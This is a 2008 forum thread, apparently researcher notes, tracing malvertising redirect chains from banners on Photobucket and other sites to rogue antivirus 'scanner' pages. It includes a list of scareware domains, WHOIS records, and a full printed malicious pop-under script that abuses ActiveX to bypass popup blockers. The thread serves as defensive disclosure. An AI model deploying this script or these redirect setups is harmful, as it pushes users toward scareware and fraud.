  139. Nettoyeurdeserreures.com
  140. Nettoyeurpuissant.com
  141. Neuerantivirus.com
  142. Neuerschild.com
  143. Nientetracce.com
  144. Nouvelantivirus.com
  145. Nurdeinpc.com
  146. Ohnespurensurfen.com
  147. Onlinehelpmate.com
  148. Onlineverktyg.com
  149. Onrainpurotekuta.com
  150. Ordureffaceur.com
  151. Oruripea.com
  152. Pasderreurs.com
  153. Pasdesfautes.com
  154. Pasdesmenaces.com
  155. Pasendommagement.com
  156. Pasplusdespertes.com
  157. Pasplusdevirus.com
  158. Pcantiviruspro.com
  159. Pcassertor.com
  160. Pcbewaker.com
  161. Pcboosterpro.com
  162. Pcbunan.com
  163. Pcforfender.com
  164. Pchealthkeeper.com
  165. Pchjaelper.com
  166. Pcinforedder.com
  167. Pckairyo.com
  168. Pclibredevirus.com
  169. Pcohnespuren.com
  170. Pcpropre.com
  171. Pcredskab.com
  172. Pcsansbug.com
  173. Pcsecuresystem.com
  174. Pcsecurise.com
  175. Pcsentineru.com
  176. Pcsiemprenueva.com
  177. Pctoolpro.com
  178. Pcultralimpia.com
  179. Pcvirussweeper.com
  180. Perfektantivirus.com
  181. Personalityprotector.com
  182. Poseidonantivirus.com
  183. Poupememoria.com
  184. Preservingtool.com
  185. Privacidadgarantizada.com
  186. Privacidadyseguridad.com
  187. Privacyredder.com
  188. Privacywaker.com
  189. Privacywarrior.com
  190. Proteccionasegurada.com
  191. Proteccioncompleta.com
  192. Proteccionimperial.com
  193. Protecteurdinfo.com
  194. Protectionconue.com
  195. Protectiondedriver.com
  196. Protectiondenetsurfage.com
  197. Proteggidati.com
  198. Protezioneesperta.com
  199. Protezionefidata.com
  200. Pulituraestrema.com
  201. Puraibashihosho.com
  202. Puraibashitoshinrai.com
  203. Rendimientototal.com
  204. Rensanu.com
  205. Reparaerrores.com
  206. Reparateurdesysteme.com
  207. Reparemenaces.com
  208. Rimuoviciarpame.com
  209. Riservatezzanet.com
  210. Safeharddrive.com
  211. Safudaijoubu.com
  212. Salvaspaziosudisco.com
  213. Sansendommagement.com
  214. Sansinfections.com
  215. Sayonarabaggu.com
  216. Schijfbewaker.com
  217. Schijfcontroleur.com
  218. Schijfredder.com
  219. Schijfruimteredder.com
  220. Schutzderdaten.com
  221. Schutzfuerpc.com
  222. Secretissimosoft.com
  223. Secretopertutti.com
  224. Secretosasalvo.com
  225. Secretoseguro.com
  226. Securepcclean.com
  227. Securepccleaner.com
  228. Securepcnaki.com
  229. Sefunahimitsu.com
  230. Sekretessforsvarare.com
  231. Selvascreensaver.com
  232. Senzadoppioni.com
  233. Shingaidome.com
  234. Shinraipafomansu.com
  235. Shisutemudifensu.com
  236. Sichererantivirus.com
  237. Sikkersystem.com
  238. Sinataques.com
  239. Sinrrastros.com
  240. Sinsenales.com
  241. Sistemaprotegido.com
  242. Sistemupyua.com
  243. Sisutemuantei.com
  244. Sisutemuorugurin.com
  245. Skyddsprogram.com
  246. Solelunaantivirus.com
  247. Spyguardpro.com
  248. Spywaretaisakumaster.com
  249. Stopbedreiging.com
  250. Stopminacce.com
  251. Succesantivirus.com
  252. Superanonimo.com
  253. Surfforsure.com
  254. Surfremover.com
  255. Sutoppuwirusu.com
  256. Syssauvegarde.com
  257. Systemerrorfixer.com
  258. Systemesansfaute.com
  259. Systemhoover.com
  260. Systemschild.com
  261. Tackanejvirus.com
  262. Tilforlatelig.com
  263. Toolsicuro.com
  264. Topsalgantivirus.com
  265. Trasheraser.com
  266. Trojansdestroyer.com
  267. Trusselovervagning.com
  268. Tryggpcverktyg.com
  269. Turnkeyantivirus.com
  270. Unidadessanas.com
  271. Usuarioprotegido.com
  272. Vaktmotvirus.com
  273. Veiligheidsagent.com
  274. Virenvernichter.com
  275. Virusbekaemper.com
  276. Viruskrakker.com
  277. Virussperr.com
  278. Volumformatredskap.com
  279. Wirusufinisshu.com
  280. Wirusuk.com
  281. Wirusukyua.com
  282. Wirusushattodaun.com
  283. Wirusushuryo.com
  284. Yourprivacyguard.com
  285. Yuzasefu.com
  286. Zentaiwakuchin.com
  287. Nettoyeurdevirus.com
c-net 89.18.181
http://www.robtex.com/cnet/89.18.181.html
Kimberly
<h4>
Estdomains ... Bad To The Bone
</h4>
Estdomains ... as if selling malicious adverts to Yahoo ain't enough; hey why not earn a few bucks more when you know that people will use search engines to find & solve similar problems ...

Scenario.

I got a malicious redirect on Yahoo, I search the web for similar problems.

Act.

Fire up Google, keywords: Yahoo banner redirects. Let's admit you click on the second link because the description is very similar to what you did experience ...
IPB Image
Hmm, the page we see doesn't reflect what we saw in google. Instead we land on another search engine.
IPB Image
Ah well, lets close the window then. Oh NO ... not again ... not another alert. Sorry to say so but yes ... unfortunately exactly the same type of alert we see with the malicious Flash banners.
IPB Image
Where the hell did this came from?

We need to examine the source code of the webpage we asked for - abc01.my5gb.com/yahoo-pi0a/yahoo-banner-ads.html - A quick look reveals the presence of a script before the webpage is loaded.
IPB Image
We are redirected to w1_abc01m_yahoo-pi0a.teachingrank.net/images/header.php which contains a function called LoadAd which redirects us to abc01m_yahoo-pi0a.teachingrank.net/index.html
IPB Image
IPB Image
index.html contains another script that lead us to fastwebway.com/exit.php?aid=0253&d=3&product=XPA
That page contains a rather complex script, checking different things ...
CODE
var url2go="http://fastwebway.com/soft.php?aid=0253&d=3&product=XPA";var
axkoord=new Array();var AXsizeres=new Array();function blockError(){return
true;}
window.onerror=blockError;if(window.SymRealWinOpen){window.open=SymRealWinOpen;}
if(window.NS_ActualOpen){window.open=NS_ActualOpen;}if(typeof
(usingClick)=="undefined"){var usingClick=false;}if(typeof
(usingActiveX)=="undefined"){var usingActiveX=false;}if(typeof
(popwin)=="undefined"){var popwin=null;}
if(typeof (poped)=="undefined"){var poped=false;}var blk=1;var
setupClickSuccess=false;var googleInUse=false;var pop="enter";var
myurl=document.location.protocol+"//"+document.location.host;var durl="";var
MAX_TRIED=20;var activeXTried=false;var tried=0;var randkey="0";var myWindow;var
popWindow;var usingAXSuccess=0;
function
usingAX(){if(usingActiveX){try{if(usingAXSuccess<5){document.writeln("<DIV><OBJE
CT ID=\"OurPopupObject\" CLASSID=\"clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A\"
WIDTH=\"1\" HEIGHT=\"1\" STYLE=\"position: absolute; top: 0; left:
0;\"></OBJECT></DIV>");document.write("<INPUT STYLE=\"display:none;\"
ID=\"autoHit\" TYPE=\"TEXT\"
ONKEYPRESS=\"showActiveX()\">");popWindow=window.createPopup();
popWindow.document.body.innerHTML="<DIV ID=\"objectRemover\"><OBJECT
ID=\"getParentDiv\" STYLE=\"position:absolute;top:0px;left:0px;\" WIDTH=1
HEIGHT=1 DATA=\""+myurl+"/popuppopup.html\"
TYPE=\"text/html\"></OBJECT></DIV>";usingAXSuccess=6;}}catch(e){if(usingAXSucces
s<5){usingAXSuccess++;setTimeout("usingAX();",500);}else{
if(usingAXSuccess==5){activeXTried=true;setupClick();}}}}}function
tryActiveX(){if(!activeXTried&&!poped){try{OurPopupObj=document.getElementById("
OurPopupObject");OurPopupObj.DOM.Script.execScript("function paypopupPop()
{return
window.open('about:blank','Ads','scrollbars=no,resizable=no,menubar=no,location=
no,top="+axkoord["y"]+",left="+axkoord["x"]+",width="+AXsizeres["w"]+",height="+
AXsizeres["h"]+"');}");popwin=OurPopupObj.DOM.Script.paypopupPop();
if(popwin){popwin.location=url2go;poped=true;}if(usingAXSuccess==6&&googleInUse&
&popWindow&&popWindow.document.getElementById("getParentDiv")&&popWindow.documen
t.getElementById("getParentDiv").object&&popWindow.document.getElementById("getP
arentDiv").object.parentWindow){myWindow=popWindow.document.getElementById("getP
arentDiv").object.parentWindow;
}else{if(usingAXSuccess==6&&!googleInUse&&popIframe&&popIframe.getParentFrame&&p
opIframe.getParentFrame.object&&popIframe.getParentFrame.object.parentWindow){my
Window=popIframe.getParentFrame.object.parentWindow;popIframe.location.replace("
about:blank");}else{setTimeout("tryActiveX()",200);
tried++;if(tried>=MAX_TRIED&&!activeXTried){activeXTried=true;setupClick();}retu
rn;}}openAXsc();window.windowFired=true;}catch(e){setTimeout("tryActiveX()",200)
;tried++;}}}function
openAXsc(){if(!activeXTried&&!poped){if(myWindow&&window.windowFired){window.win
dowFired=false;document.getElementById("autoHit").fireEvent("onkeypress",(docume
nt.createEventObject().keyCode=escape(randkey).substring(1)));}else{
setTimeout("openAXsc();",100);}tried++;if(tried>=MAX_TRIED){activeXTried=true;se
tupClick();}}}function
showActiveX(){if(!activeXTried&&!poped){if(googleInUse){window.daChildObject=pop
Window.document.getElementById("objectRemover").children(0);window.daChildObject
=popWindow.document.getElementById("objectRemover").removeChild(window.daChildOb
ject);}newWindow=myWindow.open(url2go,"mywinv23","scrollbars=no,resizable=no,men
ubar=no,location=no,top="+axkoord["y"]+",left="+axkoord["x"]+",width="+AXsizeres
["w"]+",height="+AXsizeres["h"]);if(newWindow){newWindow.blur();activeXTried=tru
e;poped=true;
}else{if(!googleInUse){googleInUse=true;tried=0;tryActiveX();}else{activeXTried=
true;setupClick();}}}}function
paypopup(){if(!poped){if(!usingClick&&!usingActiveX){popwin=window.open(url2go,"
mywinv23","scrollbars=no,resizable=no,menubar=no,location=no,top="+axkoord["y"]+
",left="+axkoord["x"]+",width="+AXsizeres["w"]+",height="+AXsizeres["h"]);if(pop
win){poped=true;}}}if(!poped){if(usingActiveX){tryActiveX();}else{setupClick();}
}}function setupClick(){if(!poped&&!setupClickSuccess){
if(window.Event){document.captureEvents(Event.CLICK);}prePaypopOnclick=document.
onclick;document.onclick=gopop;setupClickSuccess=true;}}function
gopop(){if(!poped){popwin=window.open(url2go,"mywinv23","scrollbars=no,resizable
=no,menubar=no,location=no,top="+axkoord["y"]+",left="+axkoord["x"]+",width="+AX
sizeres["w"]+",height="+AXsizeres["h"]);if(popwin){poped=true;}}if(typeof
(prePaypopOnclick)=="function"){prePaypopOnclick();}}function
detectGoogle(){if(usingActiveX){try{document.write("<DIV
STYLE=\"display:none;\"><OBJECT ID=\"detectGoogle\"
CLASSID=\"clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB\" STYLE=\"display:none;\"
CODEBASE=\"view-source:about:blank\"></OBJECT></DIV>");googleInUse|=(typeof
(document.getElementById("detectGoogle"))=="object");
}catch(e){setTimeout("detectGoogle();",50);}}}function version(){var os="W0";var
bs="I0";var _3=false;var
_4=window.navigator.userAgent;if(_4.indexOf("Win")!=-1){os="W1";}if(detectSP2())
{bs="I2";}else{if(_4.indexOf("Opera")!=-1){bs="I0";}else{if(_4.indexOf("Firefox"
)!=-1){bs="I0";}else{if(_4.indexOf("Microsoft")!=-1||_4.indexOf("MSIE")!=-1){bs=
"I1";}}}}if(top!=self){_3=true;}url2go=url2go;usingClick=blk&&((detectSP2())||(_
4.indexOf("Opera")!=-1)||(_4.indexOf("Firefox")!=-1));usingActiveX=blk&&(detectS
P2())&&!(_4.indexOf("Opera")!=-1)&&((_4.indexOf("Microsoft")!=-1)||(_4.indexOf("
MSIE")!=-1));detectGoogle();
}function detectSP2(){return
(window.navigator.userAgent.indexOf("SV1")!=-1||(navigator.appMinorVersion&&(nav
igator.appMinorVersion.indexOf("SP2")!=-1)));}version();function
ParseParams(_5,_6){var _7=_5.split(/\b\s*;\s*\b/);for(var
i=0;i<_7.length;i++){var
_9=_7[i].split(/\b\s*(=|\:)\s*\b/);axkoord[_9[0]]=_9[_9.length-1];}var
_a=_6.split(/\b\s*;\s*\b/);for(var i=0;i<_a.length;i++){var
_9=_a[i].split(/\b\s*(=|\:)\s*\b/);AXsizeres[_9[0]]=_9[_9.length-1];}}function
loadingPop(){ParseParams("x:0; y:0","w:"+window.screen.width+";
h:"+window.screen.height);if(!usingClick&&!usingActiveX){paypopup();}else{if(usi
ngActiveX){tryActiveX();}else{
setupClick();}}popwin.focus();}if(myurl==""){myurl=".";}usingAX();var
tergetURL=url2go;var exit=true;function sTb(){ParseParams("x:0;
y:0","w:"+window.screen.width+";
h:"+window.screen.height);if(exit){Player.controls.play();stb.DOM.Script.window.
open(tergetURL,"_blank","scrollbars=no,resizable=no,menubar=no,location=no,top="
+axkoord["y"]+",left="+axkoord["x"]+",width="+AXsizeres["w"]+",height="+AXsizere
s["h"]);if(window.attachEvent&&document.googleBar&&typeof
(googleBar.Search)!="undefined"){window.focus();}Player.controls.stop();window.f
ocus();}}window.onbeforeunload=sTb;document.write("<object id=Player
classid=\"CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6\" width=\"0\"
height=\"0\">");document.write("<param name=\"URL\" value=\"about:blank\">");
document.write("<PARAM name=\"uiMode\" value=\"none\">");document.write("<param
name=\"autoStart\" value=\"false\">");document.write("<param
name=\"ShowStatusBar\" value=\"0\"></object>");document.write("<object
id=\"stb\" classid=\"clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A\" width=0
height=0></object>");
Anyways ... when we close the initial search window, we get our fake scanner warning and jump to onlinexpscanner.com/2008/3/freescan.php?aid=880253
IPB Image
IPB Image
IPB Image
<h4>
Domains
</h4>
abc01.my5gb.com - 66.96.249.86

IP Location - Queensland - Brisbane - Lithoptix

Domain Name: MY5GB.COM
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Name Server: NS1.MY5GB.COM
Name Server: NS2.MY5GB.COM
Status: clientTransferProhibited
Updated Date: 27-feb-2008
Creation Date: 22-may-2007
Expiration Date: 22-may-2009

Name Servers:
ns1.my5gb.com
ns2.my5gb.com
______________________________

abc01m_yahoo-pi0a.teachingrank.net - 89.149.227.25

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217

Domain Name: TEACHINGRANK.NET

Server Type: Apache/2.2.3 (CentOS)
IP Location - Berlin - Berlin - Netdirekt E.k
Reverse IP: 48 other sites hosted on this server

Registrant:
Hampton
William M (WilliamMHampton@fontdrift.com)
112 Shady Pines Drive
Radcliff
Gulzhou,40160
CN
Tel. +270.9492330
Fax. +270.9492330

Creation Date: 19-Apr-2008
Expiration Date: 19-Apr-2009

Domain servers in listed order:
ns3.itsfreedns.com
ns2.itsfreedns.com
ns1.itsfreedns.com
______________________________

onlinexpscanner.com - 72.233.40.58

Website Title: XP antivirus protection - Official web site
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-03-20
Expires: 2009-03-20
Name Server: NS1.MYNICK.NAME (has 1,114 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

Server Type: Apache
IP Location - Texas - Plano - Layered Technologies Inc
Dedicated Hosting: onlinexpscanner.com is hosted on a dedicated server.
______________________________

fastwebway.com - 72.36.198.5

Website Title: 403 Forbidden
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-13
Expires: 2009-03-13
Name Server: MANAGEDNS1.ESTBOXES.COM (has 8,057 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

Server Type: Apache
IP Location - New York - New York - Layered Technologies Inc
Dedicated Hosting: fastwebway.com is hosted on a dedicated server.

Seen on March 23th - Ref.
______________________________

teachingrank.net being created on 19 th April 2008 ... isn't that a coincidence ... diablo.gif
Kimberly
<h4>
imunizator.com
</h4>
Ref: http://www.bluetack.co.uk/forums/index.php...ost&p=86697

Cache Date: 2008-05-01.

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Current Record.

Registrant:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

Registrant Search: "Ind" owns about 256 other domains


Thanks for the hint. punk.gif
Kimberly
<h4>
photobucket.com
</h4>
A warning about photobucket.com was issued again to Sandi's blog.

Photobucket isn't displaying 1 but at least 2 malicious banners.

The first advertisment is featuring Lady Speedstick again.

Screenshot in situ.
IPB Image
Banner.
atlas-ads.com/99000/728x90.swf
IPB Image
Campaign.
track.trackads.net/statsa.php?campaign=99000&u=1210261259237
track.trackads.net/swf/gnida.swf?campaign=99000&u=1210261259237&
paramss=[removed]

track.trackads.net/statss.php?campaign=99000&u=1210261259237&
paramss=[removed]

tds.maxconvert.com/?paramss=[removed]
adtds.trackads.net/in.cgi?2&depid=maxc_clr08&cid=2271&parid=mc_4087630891&
spywaredestructor.com/scanner/scan.php?landid=3&depid=maxc%5Fclr08&cid=2271&parid=mc%5F4087630891&bs=1
spywaredestructor.com/scanner/scan.php?landid=3&depid=maxc%5Fclr08&cid=2271&parid=mc%5F4087630891
______________________________

The second malicious banner is an advertisement for The Fast & The Furious - Tokyo Drift.

Screenshot in situ.
IPB Image
Banner.
photobkt-images.adbureau.net/photobkt/cinema_photobucket_728x90.swf
IPB Image
Campaign.
adoptserver.info/ad0.php?url=http://a1356.g.akamai.net/7/1356/2850/20060508201709/&c=567890057

iexplorer-security.org/?id=987650057
At the time of the write up, the campaign is active and redirects to the following URL's:
fastwebway.com/soft.php?aid=024204&d=1&product=XPA
xponlinescanner.com/2008/1/freescan.php?aid=77024204
IPB Image
This is the redirect reported at the photobucket forums.

<h4>
atlas-ads.com
</h4>
As usual, the 300x250 size of the Lady Speedstick banner is present on atlas-ads.com.

Banner.
atlas-ads.com/99000/300x250.swf
IPB Image
Campaign.
track.trackads.net/statsa.php?campaign=99000&u=1210261259237
Note: This is the same campaign as the 728x90 banner.
Kimberly
<h4>
Interesting ... media2.mediafileshost.com
</h4>
I was going over some network captures when the following domain / URL related to the photobucket redirects did catch my attention.
media2.mediafileshost.com/images/prep_ctr.php?imgfile=8047_562504_7245898_90_728.html&partnerId=[removed]&appId=[removed]&advertiserId=[removed]&keywordId=[removed]&type=[removed]&uuid=[removed]&keyword=[removed]&matchedBy=[removed]&redirectUrl=http%3A%2F%2Fjavascript
Note: I removed the additional parameters since only the bolded part is of interest.

And what did I spot there ... an iframe leading to the infamous atlas-ads.com. Nothing special you might say because many ads are displayed this way. But read on ...
CODE
<IFRAME WIDTH="728" HEIGHT="90" MARGINWIDTH="0" MARGINHEIGHT="0" HSPACE="0" VSPACE="0" FRAMEBORDER="0" SCROLLING="no"
SRC="http://atlas-ads.com/engine?size=728x90&campaign=99000&
clickurl=http://www.colgate.com/app/LadySpeedStick/US/HomePage.cvsp&linktarget=_blank"></IFRAME>
IPB Image
media2.mediafileshost.com - 66.179.234.173

Domain Name: MEDIAFILESHOST.COM
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Name Server: NS1.MYGEEK.COM
Name Server: NS3.MYGEEK.COM
Updated Date: 15-feb-2008
Creation Date: 15-feb-2008
Expiration Date: 15-feb-2010

CustName: myGeek.com
Address: 120 E. Van Buren Street 2nd Floor West, Suite 202
City: Phoenix
StateProv: AZ
PostalCode: 85004
Country: US
RegDate: 2004-09-21
Updated: 2004-09-21
______________________________

Mediafileshost.com - 66.104.86.4

Website Title: None given.
ICANN Registrar: GODADDY.COM, INC.
Created: 2008-02-15
Expires: 2010-02-15
Name Server: NS1.MYGEEK.COM (has 22 domains)
Name Server: NS3.MYGEEK.COM
Whois Server: whois.godaddy.com

IP Location - United States - Xo Communications

Registrant:
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States

Domain Name: MEDIAFILESHOST.COM
Created on: 15-Feb-08
Expires on: 15-Feb-10
Last Updated on: 15-Feb-08
______________________________

Can't say I like these domains a lot for several reasons, not to mention that at least 1 other issue was reported on 4th April 2008 on the softpedia forums; media2.mediafileshost.com with a similar URL and the mention "You privacy is in danger". Unfortunately I have no idea which language is spoken in the post.
IPB Image
Seeing it's a privacy protected record, I would advise extreme caution.
Kimberly
<h4>
www.mininova.org
</h4>
Nielsen banner present on www.mininova.org.

Banner & Screenshot in situ.
d3.zedo.com/OzoDB/8/e/407122/V1/nielsen_120x600.swf
IPB Image IPB Image
Campaign.
adoptserver.info/crossdomain.xml
adoptserver.info/ad0.php?url=http://a1356.g.akamai.net/7/1356/2850/20060508201709/&c=567890067
iexplorer-security.org/?id=987650067
mystats.com/crossdomain.xml
At the time of the write up, the campaign is active and redirects to the following URL's:
fastwebway.com/soft.php?aid=024211&d=1&product=XPA
xponlinescanner.com/2008/3/freescan.php?aid=77024211
<h4>
d3.zedo.com
</h4>
d3.zedo.com is Akamai hosted content ...

canonical name a456.g.akamai.net.
aliases d3.zedo.com
d3.zedo.com.edgesuite.net

Updated 05:59 AM: Added in situ screenshot.
Kimberly
<h4>
www.rlslog.net
</h4>
Travel banner present on www.rlslog.net aka Releaselog. The banner isn't new, it was first reported by Sandi on Apr 3 2008 and seen on photobucket on Apr 12 2008.

Screenshot in situ.
IPB Image
Banner.
content.yieldmanager.edgesuite.net/atoms/d0/e4/38/21/d0e4382110fedd6e68c86c5f1febe683.swf
Campaign.
stathome.net/c/index.php?id=eWthVEdIdkFTY0RBcXpPQjm7NkiZ0Ym9oPTEyMDc2NTY3NzEmcG56Y252dGE9dmFmbmVxYmF2cAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=insardonic&adid=intl
This is exactly the same advertising link and campaign as spotted on photobucket on Apr 12 2008.

It's unacceptable that an identified banner is still rotating after 1 month it was first reported.
Kimberly
<h4>
photobucket.com - slow cleanup!!!
</h4>
On 8 May 2008 we discovered two malvertisements on photobucket. - Ref - Today, I got hit by the ladyspeedstick banner again. diablo.gif

Screenshot in situ.
IPB Image
On the 8th May, photobucket was alerted through the "Contact Us" form as requested on their forums.

They replied very fast to the information I did forward via the Contact form.
QUOTE
Dear Kimberly @ Photobucket Forums,

Thank you so much for sharing all of this information with us. It has been
passed on to our Advertisement team. They will contact you if they have
further questions.

Sincerely,

Your Photobucket Support Team

------
Online Help Center: http://photobucket.com/tips.php
FAQ's: http://photobucket.com/faq
Support Forums: http://forums.photobucket.com
Support Email: support@photobucket.com
If only the Advertisement Team would have been so speedy too ... people would be able to surf without exasperation.

At the time of the write up I have no idea if the malvertisement for The Fast & The Furious - Tokyo Drift has been removed. If anyone still encouters the banner, drop us a note please. Thanks.
______________________________

Updated 20:52 PM

WTF are they doing at Photobucket ? They got all the details !!!
http://forums.majorgeeks.com/showpost.php?...amp;postcount=5
Kimberly
<h4>
photobucket.com - still not fixed
</h4>
This is getting ridiculous, I did browse 1 page and what popped up ... yep the malvertisement for The fast and The Furious - Toyko drift.

Screenshot in situ.
IPB Image
Is it so difficult to remove those banners from circulation? We did send them all the details, other people did the same thing. This slowness is simply NOT ACCEPTABLE. The banners have been identified 4 days ago!!!

Adopstool tests.
  1. Lady SpeedStick.
  2. Tokyo Drift.
<h4>
www.rlslog.net
</h4>
The banner isn't rotating anymore. The direct link to the malvertisment is still active though at the time of the write up.

<h4>
www.mininova.org
</h4>
Thanks to the prompt reaction of Niek (admin), the banner has been disabled very fast, so that issue is now officially fixed. - Annoucement.
Kimberly
<h4>
Speedbit banner
</h4>
Forwarded by a contact.

Banner.
IPB Image
Campaign.
page2.googiesindication.com/c/index.php?id=cm5DRWVaWWdjU0djeld3NjM2SmpoPTEyMTA2NzQwNjEmcG56Y252dGE9dnNwbGVyYW52cAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=ifcyrenaic
The banner itself isn't new. It was first seen on Mar 12 2008.
page2.googiesindication.com was associated with a banner from ForceUp - Desperately Seeking Buyers ....

In this case, the person was approached by Tiffany Moon from Proximogroup. They have been involved in several cases of malvertisments in the past. - Ref.

Proximogroup.com shares the same IP as 4cetera.com who has been caught selling malicious banners in the past also. - Ref.

130.117.78.25
  1. 4cetera.com
  2. Proximogroup
<h4>
photobucket.com - Tokyo Drift malvert
</h4>
If they can't fix it, try to fix it yourself ... which has been done with success by Sandi. - Ref.
IPB Image
Tokyo Drift has been cleaned up but we are not able to confirm if the Lady Speedstick banner has been removed or not at the time of the write up.
Kimberly
<h4>
Ringtones - Updated Campaign
</h4>
Forwarded by a contact. The 728x90 banner, linked to a different campaign, was first seen on Apr 3 2008.

IPB Image
IPB Image
Associated URL's.
openadstream.net/ad0.php?url=[removed]

xp-vista-update.net/?id=174400150
At the time of the write up, xp-vista-update.net/?id=174400150 redirects to Google.
Kimberly
<h4>
Ebooks - New Banner
</h4>
Forwarded by a contact.

Banner.
IPB Image
IPB Image
Campaign.
stathisranch.com/crossdomain.xml
stathisranch.com/c/index.php?id=a3IzT2xJNUJnVGhUNkm7NkiZ0Tkp0ME9oPTEyMTA5MzY5NDEmcG56Y252dGE9b2Jib2J2m7NkiZnm7NkiZyNgYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=booboisie6&adid=intl

adnetserver.com/?cmp=tmsmsposl&poa=booboisie6&pol=intl&apo=1&epo=1&edpo=2&mt_info=6019_7908_19338&rdr=1

performanceoptimizer.com/.landing?cmp=tmsmsposl&poa=booboisie6&[removed]

stats.sellmosoft.net/pos_id_performanceoptimizer/poa_booboisie6_pot103s_fr_en_edpo2/pol_intl/por_/lp_true/stats.php
Kimberly
<h4>
New survey banner
</h4>
Forwarded by email.

Banner.
IPB Image
IPB Image
IPB Image
Associated URLS.
impressiontracker.com/url/sc_6.php

yourredirect.com/soft.php?aid=000417&d=3&product=XPA
onlinescannerxp.com/2008/3/freescan.php?aid=[removed]
<h4>
impressiontracker.com - 89.149.253.221
</h4>
impressiontracker.com/url/sc_6.php
CODE
HTTP/1.1 200 OK
Date: Sun, 08 Jun 2008 13:26:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Content-Length: 0
Connection: close
Content-Type: text/html

Getting the content triggers an IDS intrusion attempt stating invalid TCP/IP options.
IPB Image
impressiontracker.com - 89.149.253.221

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-04-08
Expires: 2009-04-08
Name Server: NS1.MYNICK.NAME (has 2,247 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com
Server Type: Apache
IP Address: 89.149.253.221
IP Location - Germany - Netdirekt E.k

Registrant Search: "eosads" owns about 4 other domains.
Dedicated Hosting: impressiontracker.com is hosted on a dedicated server.

Domain Name: IMPRESSIONTRACKER.COM

Creation Date: 08-Apr-2008
Expiration Date: 08-Apr-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
eosads
Carol Hamilton carol(at)eosads.com
Baterman 58 -136
London
London,W3Z 1AC
GB
Tel. +02.089446866

<h4>
yourredirect.com - 72.233.40.59
</h4>
Website Title: 404 - Not Found
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-04-04
Expires: 2009-04-04
Name Server: NS1.MYNICK.NAME (has 2,247 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

Server Type: lighttpd
IP Address: 72.233.40.59
IP Location - Texas - Plano - Layered Technologies Inc

Dedicated Hosting: yourredirect.com is hosted on a dedicated server.

Domain Name: YOURREDIRECT.COM

Creation Date: 04-Apr-2008
Expiration Date: 04-Apr-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Last updated on 2008-05-26

<h4>
eosads.com - 216.195.62.169
</h4>
Website Title: EOSads - Internet Marketing and Online Advertising Agency
ICANN Registrar: ESTDOMAINS, INC.
Created: 2007-02-08
Expires: 2009-02-08
Name Server: DNS273.3FN.NET (has 10,885 domains)
Name Server: NS2.3FN.NET
Whois Server: whois.estdomains.com

Server Type: Apache/2.2.3 (CentOS)
IP Address: 216.195.62.169
IP Location - California - San Anselmo - Aps Telecom

Reverse IP: 85 other sites hosted on this server.

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: EOSADS.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Creation Date: 08-Feb-2007
Expiration Date: 08-Feb-2009

Domain servers in listed order:
ns2.3fn.net
dns273.3fn.net

IPB Image

IPB Image
Full List of "Customers".
  1. 21st Century Insurance
  2. America West Vacations
  3. Avenue
  4. Back in the Saddle
  5. BBC America
  6. Beauty.com
  7. British Airways Holidays
  8. Cambridge Soundworks
  9. Dick Blick Art Materials
  10. Discover Card
  11. EssayEdge
  12. Flaxart
  13. Haband
  14. Hooked on Phonics
  15. Hotwire
  16. iFLOOR
  17. iMaternity
  18. iPrint
  19. Jockey
  20. Johnson Smith
  21. Jostens
  22. Keen
  23. Linens 'n Things
  24. Liz Claiborne
  25. Maidenform
  26. Max Studio
  27. MusicMatch
  28. National Geographic
  29. Network Solutions
  30. NetZero
  31. Origins
  32. Palm Store
  33. PeoplePC
  34. Pine Meadow Golf
  35. Pitney Bowes
  36. Rail Europe
  37. S&S Worldwide
  38. SBC Communications
  39. SeaBear Smokehouse
  40. Shindigz by Stumps
  41. Springhill Nursery
  42. The Apple Store
  43. The House
  44. The Tire Rack
  45. Thomas Pink
  46. Vermont Country Store
